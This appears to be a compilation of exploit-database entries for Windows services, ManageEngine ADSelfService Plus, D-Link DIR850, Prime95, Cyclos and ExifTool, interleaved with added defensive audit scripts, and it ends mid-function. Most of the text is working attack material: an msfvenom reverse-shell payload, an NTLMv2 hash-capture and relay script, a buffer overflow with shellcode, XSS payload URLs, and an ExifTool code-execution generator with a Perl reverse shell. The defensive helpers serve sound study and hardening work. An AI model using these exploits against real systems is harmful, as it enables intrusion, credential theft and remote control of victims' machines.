simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>
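An audit helper for the permission check above, added here as an example and not part of the advisory: it parses `icacls` output for a service's install folder and reports any ACE that grants a low-privileged principal (Everyone, Users, Authenticated Users) write or full-control rights, which is what allows the service binary to be replaced. The icacls output below is constructed in the tool's format; the first block mirrors the Everyone:(OI)(CI)(F) entry the advisory reports, the second is a hardened folder for comparison.

```python
import re

# Principals that every interactive user is a member of. A write or full-control ACE for one
# of these on a folder holding a SYSTEM service binary lets any local user replace the binary.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "users",
    "nt authority\\authenticated users",
    "authenticated users",
    "nt authority\\interactive",
}
# icacls simple rights (F, M, W) and specific rights that permit modifying or replacing files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "DE", "WDAC", "WO"}

# Constructed icacls output for this example, shaped like the real tool's output: the first
# ACE shares the line with the path, following ACEs are indented, then a summary line.
FOLDER = r"C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
ICACLS_OUTPUT = r"""C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Everyone:(OI)(CI)(F)
                                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                       BUILTIN\Users:(I)(OI)(CI)(RX)
                                                       CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""
HARDENED_OUTPUT = r"""C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                       BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path: str, output: str) -> list:
    """Return [(principal, [flags...])] for every ACE in `output`, taken from `icacls path`."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Successfully processed", "Failed processing")):
            continue
        if line.lower().startswith(path.lower()):  # first ACE shares the line with the path
            line = line[len(path):].strip()
        if ":" not in line:
            continue
        principal, flags = line.rsplit(":", 1)  # principals never contain ':'
        aces.append((principal, re.findall(r"\(([^)]*)\)", flags)))
    return aces


def weak_aces(path: str, output: str) -> list:
    """ACEs that give a low-privileged principal write access to files under `path`.

    Every parenthesised group is examined: inheritance markers (I, OI, CI, IO, NP) carry no
    rights and are ignored; a rights group such as F, M or 'RX,W' is split on commas.
    """
    weak = []
    for principal, flags in parse_icacls(path, output):
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        rights = {r for group in flags for r in group.split(",")}
        if rights & WRITE_RIGHTS:
            weak.append((principal, flags))
    return weak


if __name__ == "__main__":
    for principal, flags in weak_aces(FOLDER, ICACLS_OUTPUT):
        print(f"{FOLDER}: {principal} has {''.join('(' + f + ')' for f in flags)} -> binary replaceable")
```

Remediation is to drop the offending ACE (for example `icacls "<folder>" /remove Everyone`) and re-check that the service image and its folder are writable only by Administrators and SYSTEM.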
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ITeCProteccioAppServer
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ITeCProteccioAppServer
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-0DL5SID
Nombre del sistema operativo: Microsoft Windows 11 Home
Versión del sistema operativo: 10.0.22000 N/D Compilación 22000
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto
C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: UDisk Monitor Z5 Phone
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
C:\Users\edgar>systeminfo
Nombre de host: DESKTOP-810865D
Nombre del sistema operativo: Microsoft Windows 10 Pro
Versión del sistema operativo: 10.0.19044 N/D Compilación 19044
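A check for the class of issue in the two advisories above (TCQ and UDisk Monitor), added here as an example and not part of either advisory: it reads rows shaped like `wmic service get displayname,name,pathname,startmode /format:csv` output (constructed here, including the two paths reported above), flags service images whose path contains a space but is not quoted, and lists the intermediate paths Windows tries first, which are the locations that must not be writable by standard users. The fix is to quote the image path, e.g. `sc config <name> binPath= "\"C:\full\path\svc.exe\""`.

```python
import csv
import io
import re

# Constructed rows for this example, shaped like `wmic service get ... /format:csv` output.
# The first two paths are the ones reported in the advisories above; the rest are made up.
SAMPLE_CSV = r"""Node,DisplayName,Name,PathName,StartMode
DESKTOP-810865D,UDisk Monitor Z5 Phone,UDisk Monitor Z5 Phone,C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe,Auto
DESKTOP-810865D,ITeCProteccioAppServer,ITeCProteccioAppServer,C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe,Auto
DESKTOP-810865D,Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs -p,Auto
DESKTOP-810865D,Example Quoted,ExampleQuoted,"C:\Program Files\Example\svc.exe" --service,Auto
DESKTOP-810865D,Example NoSpace,ExampleNoSpace,C:\Tools\svc.exe,Manual
"""


def split_image_path(pathname: str):
    """Return (image_path, quoted). The image ends at the closing quote, or at '.exe' when unquoted."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end != -1 else p[1:]), True
    m = re.match(r"(?i)(.*?\.exe)", p)
    return (m.group(1) if m else p.split(" ")[0]), False


def probe_paths(image: str) -> list:
    """Paths CreateProcess tries, in order, when the image path is unquoted: the prefix up to
    each space with '.exe' appended, and finally the full path."""
    candidates = [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]
    return candidates + [image]


def is_unquoted_vulnerable(pathname: str) -> bool:
    """Unquoted, contains a space, and not under C:\\Windows (the filter the advisory's findstr applies)."""
    image, quoted = split_image_path(pathname)
    return not quoted and " " in image and not image.lower().startswith("c:\\windows\\")


def audit_services(csv_text: str) -> list:
    """[(service name, image path, prefix paths that must not be creatable by users)] per vulnerable row."""
    findings = []
    # wmic's CSV output does not quote fields, so read it with quoting disabled.
    reader = csv.DictReader(io.StringIO(csv_text.strip()), quoting=csv.QUOTE_NONE)
    for row in reader:
        if not is_unquoted_vulnerable(row["PathName"]):
            continue
        image, _ = split_image_path(row["PathName"])
        findings.append((row["Name"], image, probe_paths(image)[:-1]))
    return findings


if __name__ == "__main__":
    for name, image, prefixes in audit_services(SAMPLE_CSV):
        print(f"{name}: unquoted path {image}; Windows tries {prefixes} first")
```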
# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457
# !/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys
"""
1-
a)Set up SMB server to capture NTMLv2 hash.
python3 smbserver.py share . -smb2support
b)For relaying to SMB:
python3 ntlmrelayx.py -smb2support -t smb://TARGET
c)For relaying to LDAP:
python3 ntlmrelayx.py -t ldaps://TARGET
2- Fire up the exploit.
You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_args():
parser = argparse.ArgumentParser(
epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
parser.add_argument('-u', '--user', required=True, action='store')
parser.add_argument('-p', '--password', required=True, action='store')
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
args = parser.parse_args()
return args
def scheduler(domain, auth, target, listener, user, password):
try:
with requests.Session() as s:
gUrl = target
getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
csrf = getCsrf.cookies['_zcsr_tmp']
print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])
if auth.lower() == 'adselfservice':
auth = "ADSelfService Plus Authentication"
data = {
"loginName": user,
"domainName": auth,
"j_username": user,
"j_password": password,
"AUTHRULE_NAME": "ADAuthenticator",
"adscsrf": [csrf, csrf]
}
#Login
url = target + "j_security_check"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
#Auth Check
url2 = target + "webclient/index.html"
req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
if req2.status_code == 200:
print("[+] Authentication is successful.")
elif req2.status_code == 302:
print("[-] Login failed.")
sys.exit(1)
else:
print("[-] Something went wrong")
sys.exit(1)
dn = domain.split(".")
r1 = random.randint(1, 1000)
surl = target + 'ServletAPI/Reports/saveReportScheduler'
data = {
'SCHEDULE_ID':'0',
'ADMIN_STATUS':'3',
'SCHEDULE_NAME': 'enrollment' + str(r1),
'DOMAINS': '["'+ domain +'"]',
        'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}',
        'SELECTED_REPORTS': '104,105',
        'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
        'SCHEDULE_TYPE': 'hourly',
        'TIME_OF_DAY': '0',
        'MINS_OF_HOUR': '5',
        'EMAIL_ID': user +'@'+ domain,
        'NOTIFY_ADMIN': 'true',
        'NOTIFY_MANAGER': 'false',
        'STORAGE_PATH': '\\\\' + listener + '\\share',
        'FILE_FORMAT': 'HTML',
        'ATTACHMENT_TYPE': 'FILE',
        'ADMIN_MAIL_PRIORITY': 'Medium',
        'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
        'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
        'MANAGER_FILE_FORMAT': 'HTML',
        'MANAGER_ATTACHMENT_TYPE': 'FILE',
        'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
        'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
        'adscsrf': csrf
        }
        sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
        if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
            print('[-] The target is patched!')
            sys.exit(1)
        if sch.status_code == 200:
            print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
        else:
            print("[-] Something went wrong. Please, try it manually!")
            sys.exit(1)
    # Catch request failures only: a bare 'except:' would also swallow the
    # SystemExit raised by sys.exit() above and misreport it as a connection error.
    except Exception:
        print('[-] Connection error!')


def main():
    arg = get_args()
    domain = arg.domain
    auth = arg.auth
    user = arg.user
    password = arg.password
    target = arg.target
    listener = arg.listener
    scheduler(domain, auth, target, listener, user, password)


if __name__ == "__main__":
    main()
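The STORAGE_PATH value above points the scheduled report at a UNC share on the listener, which is what makes the server authenticate outbound over SMB. As an added example (not from the script above nor the vendor's patch), this is the allow-list check a server-side fix would apply before accepting a report storage path; the host names and networks are constructed.

```python
import ipaddress
import re

# Allow-list of internal report servers (constructed values for this example).
ALLOWED_HOSTS = {"fileserver01.corp.example", "fileserver02.corp.example"}
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                ipaddress.ip_network("192.168.0.0/16")]

# \\host\share[\sub\dirs][\] ; host and share may not contain path or wildcard characters
_UNC_RE = re.compile(r'^\\\\([^\\/:*?"<>|]+)\\([^\\/:*?"<>|]+)(?:\\[^\\/:*?"<>|]+)*\\?$')


def parse_unc(path):
    """Return (host, share) for a well-formed UNC path, or None otherwise."""
    m = _UNC_RE.match(path)
    if m is None:
        return None
    return m.group(1).lower(), m.group(2)


def storage_path_allowed(path, allowed_hosts=ALLOWED_HOSTS, allowed_nets=ALLOWED_NETS):
    """Decide whether a scheduled-report storage path may be used.

    Returns (allowed, reason). Only UNC paths whose host is an allow-listed
    server name or an IP inside an allow-listed internal network pass; anything
    else (external IPs, unknown names, local drive paths) is rejected, so the
    server never initiates SMB authentication towards an arbitrary host.
    """
    parsed = parse_unc(path)
    if parsed is None:
        return False, "not a well-formed UNC path"
    host, share = parsed
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # host is a name, not an IP literal
    if ip is not None:
        if any(ip in net for net in allowed_nets):
            return True, f"IP {ip} is inside an allowed network"
        return False, f"IP {ip} is outside the allowed networks"
    # Exact FQDN match. A listed name that later resolves to an external
    # address is still a risk, so resolve and re-check the address at use time.
    if host in allowed_hosts:
        return True, f"host {host} is on the allow-list"
    return False, f"host {host} is not on the allow-list"
```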
# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
# Exploit :
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
# Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
# Exploit :
Visit http://<IP Address>/config.dat
# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86
# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# 1- How to use: open the program, go to Test -> PrimeNet, tick the checkbox, then open Connections
# 2- paste the contents of open.txt into the optional proxy hostname field and the calculator will open
buffer = b"A" * 144
jum = b"\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = b"\x90" * 20 #NOP sled
hot = b"C" * 100 #padding, not used in the final buffer
#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload = b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"
evil = buffer + jum + nop + payload
# write the buffer in binary mode so the raw bytes reach the file unchanged
with open('PExploit.txt', 'wb') as file:
    file.write(evil)
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673
# Description:
A DOM-based cross-site scripting (XSS) vulnerability in the account registration page of Cyclos 4 PRO 4.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
# Steps to reproduce:
An attacker sends a crafted URL
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When the victim opens the URL, the XSS is triggered.
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674
# Description:
Cyclos 4 PRO 4.14.7 and before does not validate user input in its error messages, which allows a remote unauthenticated attacker to execute JavaScript code via an undefined enum value.
# Steps to reproduce:
An attacker sends a crafted URL
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When the victim opens the URL, the XSS is triggered.
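Both Cyclos payloads above (CVE-2021-31673 and CVE-2021-31674) live in the URL fragment, so they never reach the server and only show up client-side or in a reported link. As an added example that is not part of either advisory, this Python triage helper undoes the URL-encoding and the JavaScript octal escapes used in the second payload so an analyst can read what the fragment actually does; the host name in the sample URLs is a placeholder.

```python
import re
from urllib.parse import unquote, urlsplit

# JavaScript octal escape such as \146 ('f'): one to three octal digits.
_JS_OCTAL = re.compile(r"\\([0-7]{1,3})")

# Fragments that indicate HTML being injected into the DOM.
_XSS_MARKERS = ("<img", "<script", "<svg", "onerror=", "onload=", "alert(", "constructor")


def decode_js_octal(text):
    """Replace JavaScript octal escapes (\\141 -> 'a') with their characters."""
    return _JS_OCTAL.sub(lambda m: chr(int(m.group(1), 8)), text)


def decode_fragment(url):
    """Fully decoded fragment (the part after '#') of a URL, or '' if there is none."""
    return decode_js_octal(unquote(urlsplit(url).fragment))


def xss_indicators(url):
    """Markers present in the decoded fragment of a reported URL, in a fixed order."""
    decoded = decode_fragment(url).lower()
    return [marker for marker in _XSS_MARKERS if marker in decoded]


# Constructed copies of the two advisory URLs with a placeholder host.
CVE_2021_31673_URL = (
    r"https://cyclos.example/#users.users.public-registration!groupId="
    r"1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
)
CVE_2021_31674_URL = (
    r"https://cyclos.example/#users.users.public-registrationxx%3Cimg%20src=x%20"
    r"onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143"
    r"\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()"
    r"['\141\154\145\162\164'](1)%22%3E"
)

if __name__ == "__main__":
    for url in (CVE_2021_31673_URL, CVE_2021_31674_URL):
        print(decode_fragment(url))
        print("indicators:", xss_indicators(url))
```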
# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution
# Date: 04/30/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://exiftool.org/
# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
# Version: 7.44-12.23
# Tested on: ExifTool 12.23 (Debian)
# CVE: CVE-2021-22204
# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204
# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
#!/usr/bin/env python3
# Imports
import base64
import os
import subprocess
import sys


# Class for colors
class color:
    red = '\033[91m'
    gold = '\033[93m'
    blue = '\033[36m'
    green = '\033[92m'
    no = '\033[0m'


# Print UNICORD ASCII Art
def UNICORD_ASCII():
    print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")


# Print exploit help menu
def help():
    print(r"""UNICORD Exploit for CVE-2021-22204
Usage:
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
Options:
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
""")


# Run the exploit
def exploit(command):
    UNICORD_ASCII()
    # Create perl payload ("\\c" keeps the literal backslash-c that the DjVu parser interprets)
    payload = "(metadata \"\\c${"
    payload += command
    payload += "};\")"
    print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")
    print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")
    # Write payload to file
    payloadFile = open('payload','w')
    payloadFile.write(payload)
    payloadFile.close()
    # Bzz compress file
    subprocess.run(['bzz', 'payload', 'payload.bzz'])
    # Run djvumake
    subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
    if '-i' in sys.argv:
        imagePath = sys.argv[sys.argv.index('-i') + 1]
        subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])
    else:
        # Smallest possible JPEG
        image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        # Write smallest possible JPEG image to file
        with open("image.jpg", "wb") as img:
            img.write(base64.decodebytes(image))
    # Write exiftool config to file
    config = (r"""
%Image::ExifTool::UserDefined = (
    'Image::ExifTool::Exif::Main' => {
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
    },
);
1; #end
""")
    configFile = open('exiftool.config','w')
    configFile.write(config)
    configFile.close()
    # Exiftool config for output image
    subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])
    # Delete leftover files
    os.remove("payload")
    os.remove("payload.bzz")
    os.remove("exploit.djvu")
    os.remove("exiftool.config")
    # Print results
    print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")
    exit()


if __name__ == "__main__":
    args = ['-h','-c','-s','-i']
    if args[0] in sys.argv:
        help()
    elif args[1] in sys.argv and not args[2] in sys.argv:
        exec = sys.argv[sys.argv.index(args[1]) + 1]
        command = f"system(\'{exec}\')"
        exploit(command)
    elif args[2] in sys.argv and not args[1] in sys.argv:
        localIP = sys.argv[sys.argv.index(args[2]) + 1]
        localPort = sys.argv[sys.argv.index(args[2]) + 2]
        command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"
        exploit(command)
    else:
        help()
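The image the script produces carries a complete DjVu container (built by djvumake with INFO, BGjp and ANTz chunks) inside EXIF tag 0xc51b, and a JPEG has no legitimate reason to contain one. As an added example that is not part of the UNICORD script, this Python scanner locates any AT&TFORM container in a file and walks its chunks, so an upload pipeline can flag such files before ExifTool ever parses them. The sample bytes are constructed inline.

```python
import struct

DJVU_MAGIC = b"AT&TFORM"


def find_djvu_containers(data):
    """Offsets of every 'AT&TFORM' header inside the blob (a clean JPEG has none)."""
    offsets, pos = [], 0
    while (pos := data.find(DJVU_MAGIC, pos)) != -1:
        offsets.append(pos)
        pos += len(DJVU_MAGIC)
    return offsets


def parse_djvu_chunks(data, offset):
    """Walk the IFF-style layout 'AT&TFORM' u32len form_type (id u32len payload pad)*.

    Returns (form_type, [(chunk_id, payload), ...]); truncated input is tolerated."""
    pos = offset + len(DJVU_MAGIC)
    if len(data) < pos + 8:
        return b"", []
    (form_len,) = struct.unpack(">I", data[pos:pos + 4])
    pos += 4
    end = min(pos + form_len, len(data))
    form_type, pos = data[pos:pos + 4], pos + 4
    chunks = []
    while pos + 8 <= end:
        chunk_id = data[pos:pos + 4]
        (chunk_len,) = struct.unpack(">I", data[pos + 4:pos + 8])
        chunks.append((chunk_id, data[pos + 8:pos + 8 + chunk_len]))
        pos += 8 + chunk_len + (chunk_len & 1)  # chunks are padded to an even length
    return form_type, chunks


def assess_image(data):
    """Findings for a suspected image; an empty list means no DjVu payload was found."""
    findings = []
    for offset in find_djvu_containers(data):
        form_type, chunks = parse_djvu_chunks(data, offset)
        findings.append(f"DjVu {form_type.decode('ascii', 'replace')} container at offset {offset}")
        for chunk_id, payload in chunks:
            if chunk_id == b"ANTz":
                findings.append("ANTz: bzz-compressed annotation, contents hidden until decompressed")
            elif chunk_id == b"ANTa" and b"(metadata" in payload:
                escape = " with \\c escape" if b"\\c" in payload else ""
                findings.append(f"ANTa: plain annotation carrying a metadata record{escape}")
    return findings


def build_sample_djvu(annotation_chunk, annotation):
    """Constructed minimal DjVu container (INFO + one annotation chunk) for testing."""
    def chunk(chunk_id, payload):
        pad = b"\x00" if len(payload) & 1 else b""
        return chunk_id + struct.pack(">I", len(payload)) + payload + pad
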